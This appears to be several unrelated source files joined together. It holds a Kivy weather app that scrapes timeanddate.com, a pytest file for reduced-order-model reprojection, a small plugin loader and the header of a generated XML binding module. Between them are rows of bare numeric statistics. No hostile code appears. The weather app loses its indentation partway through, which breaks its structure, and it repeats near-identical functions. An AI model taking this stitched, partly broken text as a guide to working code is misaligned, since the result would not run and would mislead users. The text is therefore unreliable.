            url = 'https://www.timeanddate.com/weather/'+self.country_of_search +'/' + city
            # Probe the city page first; a non-OK response means the city
            # does not exist on timeanddate.com.
            if requests.get(url).ok:
                print(url)
                self.hourly_url = url + "/hourly"
                self.daily_url = url + "/ext"
                self.new_screen.ids.city_name.text = city.title()
                # new_daily also triggers new_hourly internally.
                self.new_daily(self.daily_url)
                # NOTE(review): background_time is defined outside this view.
                self.background_time()
                self.root.ids['new_screen'].ids.city.text = city.title()
                self.root.ids['screen_manager'].current = self.screen_text
                # Close the search dialog (self.sea is set elsewhere).
                self.sea.dismiss()
            else:
                # Unknown city: show an error label inside the search dialog.
                self.sea.ids['spot'].add_widget(Label(text="Not Founded",pos_hint={"center_x":.5,"center_y":.45},color=(0,122,122,1),font_size="22sp"))
        except Exception:
            # Any scraping/widget error is reported the same way.
            self.sea.ids['spot'].add_widget(
                Label(text="Not Founded", pos_hint={"center_x": .5, "center_y": .45}, color=(0, 0, 0, 1),font_size="22sp" ))
    def new_daily(self,url):
        """Scrape the extended-forecast page and populate the city screen.

        Fills the "today" summary widgets from table row 2, calls
        new_hourly, then adds one card_of_daily per following day.
        Parsing relies on positional slicing of timeanddate.com row text,
        so it is inherently fragile against site layout changes.
        """
        r = requests.get(url)
        soup = BeautifulSoup(r.content, "html.parser")
        tablo = soup.find(class_='tb-scroll')
        img = tablo.find_all('img')
        data = tablo.find_all('tr')
        # ---- today: row index 2 of the forecast table ----
        full_text = data[2].get_text()
        # Sunset/sunrise are the last two 5-character chunks of the row text
        # (sliced backwards, then reversed back into reading order).
        sunset = full_text[-1:-6:-1][::-1]
        sunrise = full_text[-6:-11:-1][::-1]
        print(sunrise, sunset)
        texts = str(full_text).split(" ")
        situation = str(full_text).split("°C")
        wind = situation[2][0:7]
        day_name = texts[0][0:3]
        day_num = texts[0].replace(day_name[0:3], "")
        day = day_num + texts[1][0:3]
        second = texts[3].replace("xa", " ")
        second = situation[0].split(" ")
        temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
        day_name = days[day_name]
        print("day name ==", day_name)
        print("day ==", day)
        print("temperature ==", temp)
        situation = situation[1].split(".")
        # The three branches below differ only in where the numeric
        # "feels like" value landed after splitting the description on ".".
        if situation[1][0:2].isdigit() == True:
            situation_of_weather = situation[0]
            print("situation of weather ==", situation_of_weather)
            feels_like = str(situation[1]) + " °C"
            print("feels like ==", feels_like)
            print("wind speed ==", wind)
            print("*" * 40)
            source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
            source = "weather_images/" + source + ".png"
            status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
                " / ") + " temperature"
            print(status)
            self.new_screen.ids.feels_like.text = feels_like
            self.new_screen.ids.sunrise.text = sunrise
            self.new_screen.ids.sunset.text = sunset
            self.new_screen.ids.wind.text = wind
            self.new_screen.ids.today_info.text = status
            self.sunrise = sunrise
            self.sunset = sunset
        elif situation[1][0:1].isdigit() == True:
            situation_of_weather = situation[0]
            print("situation of weather ==", situation_of_weather)
            feels_like = str(situation[1]) + " °C"
            print("feels like ==", feels_like)
            print("wind speed ==", wind)
            print("*" * 40)
            source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
            source = "weather_images/" + source + ".png"
            status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
                " / ") + " temperature"
            self.new_screen.ids.feels_like.text = feels_like
            self.new_screen.ids.sunrise.text = sunrise
            self.new_screen.ids.sunset.text = sunset
            self.new_screen.ids.wind.text = wind
            self.new_screen.ids.today_info.text = status
            self.sunrise = sunrise
            self.sunset = sunset
        else:
            # Description itself contained a "." -- rejoin its two halves.
            situation_of_weather = str(situation[0]) + str(situation[1])
            print("situation of weather ==", situation_of_weather)
            feels_like = str(situation[2]) + " °C"
            print("feels like ==", feels_like)
            print("wind speed ==", wind)
            print("*" * 40)
            source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
            source = "weather_images/" + source + ".png"
            status = "Today: " + situation_of_weather + " and weather is between " + temp.replace("/",
                " / ") + " temperature"
            print(status)
            self.new_screen.ids.feels_like.text = feels_like
            self.new_screen.ids.sunrise.text = sunrise
            self.new_screen.ids.sunset.text = sunset
            self.new_screen.ids.wind.text = wind
            self.new_screen.ids.today_info.text = status
            self.sunrise = sunrise
            self.sunset = sunset
        # Populate the hourly list before building the daily cards
        # (original note: kept here because the code is interdependent).
        self.new_hourly(self.hourly_url)
        # ---- remaining days: one card_of_daily per table row ----
        for i in range(2, len(data) - 3):
            j = i - 2
            # Extract the icon filename from the row's <img src=...> tag.
            src = str(img[j]).split("src")
            src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
            print(src)
            full_text = data[i].get_text()
            sunset = full_text[-1:-6:-1][::-1]
            sunrise = full_text[-6:-11:-1][::-1]
            print(sunrise, sunset)
            texts = str(full_text).split(" ")
            situation = str(full_text).split("°C")
            wind = situation[2][0:7]
            day_name = texts[0][0:3]
            day_num = texts[0].replace(day_name[0:3], "")
            day = day_num + texts[1][0:3]
            second = texts[3].replace("xa", " ")
            second = situation[0].split(" ")
            temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
            day_name = days[day_name]
            if i == 2:
                print(full_text)
                sunset = full_text[-1:-6:-1][::-1]
                sunrise = full_text[-6:-11:-1][::-1]
            print("day name ==", day_name)
            print("day ==", day)
            print("temperature ==", temp)
            situation = situation[1].split(".")
            # Same three-way "feels like" disambiguation as for today.
            if situation[1][0:2].isdigit() == True:
                situation_of_weather = situation[0]
                print("situation of weather ==", situation_of_weather)
                feels_like = str(situation[1]) + " °C"
                print("feels like ==", feels_like)
                print("wind speed ==", wind)
                print("*" * 40)
                source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
                src = "weather_images/" + src
                print(source)
                self.new_screen.ids.daily.add_widget(
                    card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
                                  text_color=self.text_color))
            elif situation[1][0:1].isdigit() == True:
                situation_of_weather = situation[0]
                print("situation of weather ==", situation_of_weather)
                feels_like = str(situation[1]) + " °C"
                print("feels like ==", feels_like)
                print("wind speed ==", wind)
                print("*" * 40)
                source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
                src = "weather_images/" + src
                print(source)
                self.new_screen.ids.daily.add_widget(
                    card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
                                  text_color=self.text_color))
            else:
                denemelik = situation[0]
                situation_of_weather = str(situation[0]) + str(situation[1])
                print("situation of weather ==", situation_of_weather)
                feels_like = str(situation[2]) + " °C"
                print("feels like ==", feels_like)
                print("wind speed ==", wind)
                print("*" * 40)
                src = "weather_images/" + src
                self.new_screen.ids.daily.add_widget(
                    card_of_daily(day=day_name, temperature=temp, image=src, color=self.bc_color,
                                  text_color=self.text_color))
        pass
def new_hourly(self,url):
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
data = tablo.find_all('tr')
img = tablo.find_all('img')
self.time = data[2].get_text()[:5]
self.background_time()
for i in range(3, len(data) - 1):
full_text = data[i].get_text()
hour = full_text[:5]
# here is gonna be as a different splitting cause of day
j = i - 2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
temp_of_hour = full_text[5:10]
new_text = full_text[10:]
new_text = str(new_text).split("°C")
feels_like = new_text[0]
feels_like = feels_like[:-4:-1]
status = new_text[0]
status = status[:-3]
wind = new_text[1]
wind = wind[0:7]
feels_like = feels_like[::-1]
new_temp = str(full_text).split("°C")[1].split(".")[-1].replace(" ","")+"°C"
print("time == ", hour)
print("Temperature of hour == ", new_temp)
print("situation of weather == ", status)
print("Feels like == ", feels_like)
print("Wind == ", wind)
print("*" * 40)
status = str(status).replace(" ", "_").replace(".", "").lower()
if int(str(hour)[0:2]) < 6 or int(str(hour)[0:2]) > 21:
morning = True
night = False
if str(hour[0:2]) == "00": # i am gonna put here png which is gonna be This New Day text thing
status = "weather_images/" +"new_day.png"
print("newday")
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=full_text[5:11],
bc_color=self.bc_color, text_color=self.text_color))
else:
src = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(src), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
else:
night = True
morning = False
print(status)
if status == "sprinkles_more_sun_than_clouds":
status = "rainy"
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
elif status == "sprinkles_partly_cloudy":
status = "rainy"
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
else:
status = "weather_images/" + src
self.new_screen.ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,
bc_color=self.bc_color, text_color=self.text_color))
pass
    def new_one(self):
        """Open the city-search dialog and keep a reference to it on ``self.sea``."""
        # `search` is defined elsewhere in the project; it exposes .open(),
        # presumably a Kivy popup/dialog — TODO confirm.
        self.sea = search()
        self.sea.open()
def background_time(self):
print(self.time)
print(self.sunrise)
print(self.sunset)
if int(self.time[0:2]) > int(self.sunrise[0:2]) and int(self.time[0:2])<= int(self.sunset[0:2]):
print("öğlen")
self.bc_color =(.1098, .650, .99215, 1)
self.text_color = (1,1,1,1)
else:
print("akşam")
self.bc_color =(.019,.11,.47 ,1)
self.text_color = (1,1,1,1)
    def on_start(self):
        """App startup hook: load the daily forecast (which also stores
        sunrise/sunset and triggers the hourly forecast), then set the
        initial background colours."""
        self.daily(daily_url)  # `daily_url` is a module-level constant defined elsewhere in the file
        self.background_time()
def daily(self, url):
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
img = tablo.find_all('img')
data = tablo.find_all('tr')
full_text = data[2].get_text()
#######
#####
###
##
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise, sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
# self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
print(status)
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
else:
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
source = "weather_images/" + source + ".png"
status = "Today: "+ situation_of_weather +" and weather is between " +temp.replace("/"," / ")+" temperature"
print(status)
#self.root.ids['main_screen'].today.add_widget(card_of_today(sunrise=sunrise,sunset=sunset,wind=wind,feels_like=feels_like,status=situation_of_weather))
self.root.ids['main_screen'].ids.feels_like.text = feels_like
self.root.ids['main_screen'].ids.sunrise.text = sunrise
self.root.ids['main_screen'].ids.sunset.text = sunset
self.root.ids['main_screen'].ids.wind.text = wind
self.root.ids['main_screen'].ids.today_info.text = status
self.sunrise = sunrise
self.sunset = sunset
####
###
###
###
###
self.hourly(hourly_url) ##### This code suppose to be here cause of i little bit comlicated the code
#######
####
###
for i in range(2, len(data) - 3):
j = i-2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg","") +".png"
print(src)
full_text = data[i].get_text()
sunset =full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print(sunrise,sunset)
texts = str(full_text).split(" ")
# print(texts)
# print(full_text)
situation = str(full_text).split("°C")
# print(situation)
wind = situation[2][0:7]
day_name = texts[0][0:3]
day_num = texts[0].replace(day_name[0:3], "")
day = day_num + texts[1][0:3]
second = texts[3].replace("xa", " ")
second = situation[0].split(" ")
# print(second)
temp = str(texts[1][3:]) + "/" + str(second[3].replace("\xa0", "") + " °C")
day_name = days[day_name]
if i == 2:
print(full_text)
sunset = full_text[-1:-6:-1][::-1]
sunrise = full_text[-6:-11:-1][::-1]
print("day name ==", day_name)
print("day ==", day)
print("temperature ==", temp)
situation = situation[1].split(".")
# print(situation)
if situation[1][0:2].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
elif situation[1][0:1].isdigit() == True:
situation_of_weather = situation[0]
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[1]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
source = str(situation_of_weather).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
print(source)
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
else:
denemelik = situation[0]
situation_of_weather = str(situation[0]) + str(situation[1])
print("situation of weather ==", situation_of_weather)
feels_like = str(situation[2]) + " °C"
print("feels like ==", feels_like)
print("wind speed ==", wind)
print("*" * 40)
#source = str(denemelik).replace(" ", "_").replace(".", "").lower()
src = "weather_images/" + src
#self.root.ids['main_screen'].ids.day.add_widget(card(hour=))
self.root.ids['main_screen'].ids.daily.add_widget(card_of_daily(day=day_name,temperature=temp,image=src,color=self.bc_color,text_color=self.text_color))
    # ------------------------------------------------------------------
    # end of daily(); hourly() below renders the per-hour forecast cards
    # ------------------------------------------------------------------
def hourly(self,url): # This is literally good for now without png spots
r = requests.get(url)
soup = BeautifulSoup(r.content, "html.parser")
tablo = soup.find(class_='tb-scroll')
data = tablo.find_all('tr')
img = tablo.find_all('img')
self.time = data[2].get_text()[:5]
self.background_time()
for i in range(3, len(data) - 1):
full_text = data[i].get_text()
hour = full_text[:5]
print(full_text)
new_temp = str(full_text).split("°C")[1].split(".")[-1].replace(" ","")+"°C"
j = i - 2
src = str(img[j]).split("src")
src = src[1].split(" ")[0].replace("=", "")[1:][:-1][24:].replace(".svg", "") + ".png"
temp_of_hour = full_text[5:10]
new_text = full_text[10:]
new_text = str(new_text).split("°C")
feels_like = new_text[0]
feels_like = feels_like[:-4:-1]
status = new_text[0]
status = status[:-3]
wind = new_text[1]
wind = wind[0:7]
feels_like = feels_like[::-1]
print("time == ", hour)
print("Temperature of hour == ", new_temp)
print("situation of weather == ", status)
print("Feels like == ", feels_like)
print("Wind == ", wind)
print("*" * 40)
status = str(status).replace(" ", "_").replace(".", "").lower()
if int(str(hour)[0:2])<6 or int(str(hour)[0:2])>21 :
morning = True
night = False
if str(hour[0:2]) == "00": # i am gonna put here png which is gonna be This New Day text thing
status = "weather_images/" "new_day.png"
print("newday")
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=full_text[5:11],bc_color=self.bc_color,text_color=self.text_color))
else:
src = src = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(src), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
else:
night = True
morning = False
print(status)
if status == "sprinkles_more_sun_than_clouds":
status = "rainy"
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(
card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
elif status == "sprinkles_partly_cloudy":
status = "rainy"
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
else:
status = "weather_images/" + src
self.root.ids['main_screen'].ids.hour.add_widget(card_of_hours(hour=hour, status_of_weather=str(status), temp_of_hour=new_temp,bc_color=self.bc_color,text_color=self.text_color))
MainApp().run()  # entry point: instantiate the app and start its event loop
| 45.73947
| 206
| 0.518401
| 3,379
| 29,319
| 4.314294
| 0.068363
| 0.046303
| 0.074084
| 0.038071
| 0.871313
| 0.862121
| 0.851008
| 0.848265
| 0.845795
| 0.845795
| 0
| 0.019647
| 0.333367
| 29,319
| 640
| 207
| 45.810938
| 0.724891
| 0.075582
| 0
| 0.805447
| 0
| 0
| 0.098559
| 0.004918
| 0.001946
| 0
| 0
| 0
| 0
| 1
| 0.015564
| false
| 0.013619
| 0.023346
| 0
| 0.085603
| 0.196498
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2c9f0de5893f88b71fee3e4249054c63bd82c1b
| 4,971
|
py
|
Python
|
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | 2
|
2020-02-24T17:37:53.000Z
|
2020-05-17T23:26:45.000Z
|
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | null | null | null |
tests/pre/test_reprojection.py
|
shanemcq18/rom-operator-inference-Python3
|
ba4bfeaba692f10bf426561c64e7c9fb21120620
|
[
"MIT"
] | null | null | null |
# pre/test_reprojection.py
"""Tests for rom_operator_inference.pre._reprojection.py"""
import pytest
import numpy as np
from scipy import linalg as la
import rom_operator_inference as opinf
# Reprojection schemes ========================================================
def test_reproject_discrete(n=50, m=5, r=3):
    """Test pre._reprojection.reproject_discrete().

    Builds random linear/quadratic discrete-time operators, re-projects
    trajectories onto an r-dimensional basis, and checks that Operator
    Inference recovers the projected operators exactly.
    """
    # Construct dummy operators.
    k = 1 + r + r*(r+1)//2  # number of snapshots; presumably sized for exact recovery of "AH" — TODO confirm
    D = np.diag(1 - np.logspace(-1, -2, n))  # diagonal spectrum inside (0, 1)
    W = la.qr(np.random.normal(size=(n,n)))[0]  # random orthogonal matrix
    A = W.T @ D @ W  # linear operator with the spectrum of D
    Ht = np.random.random((n,n,n))
    H = (Ht + Ht.T) / 20  # add the axis-reversed tensor and scale down
    H = H.reshape((n, n**2))  # matricized quadratic operator
    B = np.random.random((n,m))  # 2D input operator
    U = np.random.random((m,k))  # 2D input trajectory
    B1d = np.random.random(n)  # 1D input operator
    U1d = np.random.random(k)  # 1D input trajectory
    Vr = np.eye(n)[:,:r]  # trivial rank-r basis (first r coordinates)
    x0 = np.zeros(n)
    x0[0] = 1  # initial condition lies inside the span of Vr
    # Try with bad initial condition shape.
    with pytest.raises(ValueError) as exc:
        opinf.pre.reproject_discrete(lambda x: x, Vr, x0[:-1], k)
    assert exc.value.args[0] == "basis Vr and initial condition x0 not aligned"
    # Linear case, no inputs.
    def f(x):
        return A @ x
    X_ = opinf.pre.reproject_discrete(f, Vr, x0, k)
    assert X_.shape == (r,k)
    rom = opinf.InferredDiscreteROM("A").fit(Vr, X_)
    assert np.allclose(Vr @ X_, rom.predict(X_[:,0], k))
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)  # recovered operator == projection
    # Linear case, 1D inputs.
    def f(x, u):
        return A @ x + B1d * u
    X_ = opinf.pre.reproject_discrete(f, Vr, x0, k, U1d)
    assert X_.shape == (r,k)
    rom = opinf.InferredDiscreteROM("AB").fit(Vr, X_, U1d)
    assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k, U1d))
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)
    assert np.allclose(rom.B_.flatten(), Vr.T @ B1d)
    # Linear case, 2D inputs.
    def f(x, u):
        return A @ x + B @ u
    X_ = opinf.pre.reproject_discrete(f, Vr, x0, k, U)
    assert X_.shape == (r,k)
    rom = opinf.InferredDiscreteROM("AB").fit(Vr, X_, U)
    assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k, U))
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)
    assert np.allclose(rom.B_, Vr.T @ B)
    # Quadratic case, no inputs.
    def f(x):
        return A @ x + H @ np.kron(x,x)
    X_ = opinf.pre.reproject_discrete(f, Vr, x0, k)
    assert X_.shape == (r,k)
    rom = opinf.InferredDiscreteROM("AH").fit(Vr, X_)
    assert np.allclose(X_, Vr.T @ rom.predict(X_[:,0], k))
    assert np.allclose(rom.A_, Vr.T @ A @ Vr, atol=1e-6, rtol=1e-6)
    # Compare the quadratic operator through its action, since rom.H_ is
    # stored in compact (kron2c) form rather than as the full Kronecker form.
    H_ = Vr.T @ H @ np.kron(Vr, Vr)
    for _ in range(10):
        x_ = np.random.random(r)
        x2_ = np.kron(x_, x_)
        assert np.allclose(rom.H_ @ opinf.utils.kron2c(x_), H_ @ x2_)
def test_reproject_continuous(n=100, m=20, r=10):
    """Test pre._reprojection.reproject_continuous().

    Same structure as test_reproject_discrete(), but for continuous-time
    systems: re-projection returns both states and time derivatives.
    """
    # Construct dummy operators.
    k = 1 + r + r*(r+1)//2  # number of snapshots; presumably sized for exact recovery of "AH" — TODO confirm
    D = np.diag(1 - np.logspace(-1, -2, n))  # diagonal spectrum inside (0, 1)
    W = la.qr(np.random.normal(size=(n,n)))[0]  # random orthogonal matrix
    A = W.T @ D @ W  # linear operator with the spectrum of D
    Ht = np.random.random((n,n,n))
    H = (Ht + Ht.T) / 20  # add the axis-reversed tensor and scale down
    H = H.reshape((n, n**2))  # matricized quadratic operator
    B = np.random.random((n,m))  # 2D input operator
    U = np.random.random((m,k))  # 2D input trajectory
    B1d = np.random.random(n)  # 1D input operator
    U1d = np.random.random(k)  # 1D input trajectory
    Vr = np.eye(n)[:,:r]  # trivial rank-r basis (first r coordinates)
    X = np.random.random((n,k))  # random full-order snapshot matrix
    # Try with bad initial condition shape.
    with pytest.raises(ValueError) as exc:
        opinf.pre.reproject_continuous(lambda x:x, Vr, X[:-1,:])
    assert exc.value.args[0] == \
        f"X and Vr not aligned, first dimension {n-1} != {n}"
    # Linear case, no inputs.
    def f(x):
        return A @ x
    X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X)
    assert X_.shape == (r,k)
    assert Xdot_.shape == (r,k)
    rom = opinf.InferredContinuousROM("A").fit(Vr, X_, Xdot_)
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)  # recovered operator == projection
    # Linear case, 1D inputs.
    def f(x, u):
        return A @ x + B1d * u
    X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X, U1d)
    assert X_.shape == (r,k)
    assert Xdot_.shape == (r,k)
    rom = opinf.InferredContinuousROM("AB").fit(Vr, X_, Xdot_, U1d)
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)
    assert np.allclose(rom.B_.flatten(), Vr.T @ B1d)
    # Linear case, 2D inputs.
    def f(x, u):
        return A @ x + B @ u
    X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X, U)
    assert X_.shape == (r,k)
    assert Xdot_.shape == (r,k)
    rom = opinf.InferredContinuousROM("AB").fit(Vr, X_, Xdot_, U)
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)
    assert np.allclose(rom.B_, Vr.T @ B)
    # Quadratic case, no inputs.
    def f(x):
        return A @ x + H @ np.kron(x,x)
    X_, Xdot_ = opinf.pre.reproject_continuous(f, Vr, X)
    assert X_.shape == (r,k)
    assert Xdot_.shape == (r,k)
    rom = opinf.InferredContinuousROM("AH").fit(Vr, X_, Xdot_)
    assert np.allclose(rom.A_, Vr.T @ A @ Vr)
    # Compare the quadratic operator through its action, since rom.H_ is
    # stored in compact (kron2c) form rather than as the full Kronecker form.
    H_ = Vr.T @ H @ np.kron(Vr, Vr)
    for _ in range(10):
        x_ = np.random.random(r)
        x2_ = np.kron(x_, x_)
        assert np.allclose(rom.H_ @ opinf.utils.kron2c(x_), H_ @ x2_)
| 34.520833
| 79
| 0.577147
| 832
| 4,971
| 3.328125
| 0.13101
| 0.052004
| 0.104009
| 0.096064
| 0.824847
| 0.811123
| 0.798122
| 0.798122
| 0.798122
| 0.798122
| 0
| 0.021395
| 0.238383
| 4,971
| 143
| 80
| 34.762238
| 0.709984
| 0.116073
| 0
| 0.718182
| 0
| 0
| 0.024971
| 0
| 0
| 0
| 0
| 0
| 0.290909
| 1
| 0.090909
| false
| 0
| 0.036364
| 0.072727
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2cf9821dfc6b495baa1b2569e0ad255b12b258f
| 98
|
py
|
Python
|
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
from cloeepy_boto.cloeepy_boto import CloeePyBoto
def get_plugin_class():
    """Return the plugin class this package exposes (``CloeePyBoto``)."""
    plugin_cls = CloeePyBoto
    return plugin_cls
| 19.6
| 49
| 0.826531
| 13
| 98
| 5.923077
| 0.769231
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 98
| 4
| 50
| 24.5
| 0.905882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a2d67fc2fc0e99ede0cea4de4b5cb88e8cc0f7c8
| 171,922
|
py
|
Python
|
silver/silverraw/silvercore.py
|
IshavanBaar/railaid
|
d8d1c4f834018b954d70ccb00a626961617d5453
|
[
"MIT"
] | 5
|
2015-11-17T12:47:20.000Z
|
2017-06-15T14:10:29.000Z
|
silver/silverraw/silvercore.py
|
HackTrain/silver
|
339165d1b2cc6988567ce94313a66c5c0b0b95c4
|
[
"MIT"
] | null | null | null |
silver/silverraw/silvercore.py
|
HackTrain/silver
|
339165d1b2cc6988567ce94313a66c5c0b0b95c4
|
[
"MIT"
] | null | null | null |
# ./silvercore.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:124ab58ff634848548cf6d9d1320f856ff23519e
# Generated 2015-11-14 16:58:02.798568 by PyXB version 1.2.4 using Python 2.7.9.final.0
# Namespace http://schemas.xmlsoap.org/soap/envelope/
from __future__ import unicode_literals
import pyxb
import pyxb.binding
